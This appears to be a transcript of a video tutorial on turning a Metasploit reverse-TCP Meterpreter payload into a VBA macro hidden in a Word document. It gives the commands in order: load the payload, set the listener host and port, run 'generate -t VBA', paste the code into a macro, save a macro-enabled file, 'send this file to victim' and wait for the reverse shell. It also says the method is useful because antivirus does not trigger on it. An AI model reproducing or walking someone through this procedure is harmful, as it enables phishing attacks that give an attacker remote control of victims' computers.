Welcome. In this video we are going to learn get shell using shellcode macro in Metasploit. We can execute shellcode directly in macro. It's very old method, but still it's useful because antivirus don't trigger it. First we'll generate VB code of our payload, that is Visual Basics. Let's open up terminal, type MSF console. Let's load reverse_TCP payload into the MSF console. Type use payload /windows meterpreter /reverse_TCP. Type info. Here we can see that payload information, lhost listen port address, lport listen port. Set lhost as 192.168.1.102. Set lport as 443. Let's generate VBA script. Type generate -t VBA. Now we have generated our shell code. Now we will create macro. Open any Word or Excel document. Then click on view and then click on macros. Give name to macro and create a macro. Remove all things from modules windows and paste our generated VB code. Save it as type Word macro enable document. Send this file to victim. By default in MS Office, disable all macros with notification option is enabled. So whenever any document try to execute macro, it will pop up security warning that macro is disabled. So to execute our shell code using macro, victim should click on enable content. You have to set up listener to listen reverse connection. If your IP is not available when victim open document, then the document will crash. So now we will set up listener. Once user click on document, Meterpreter session will be opened. So that's it in this video on get shell using shellcode in macro in Metasploit. Thank you for watching this video.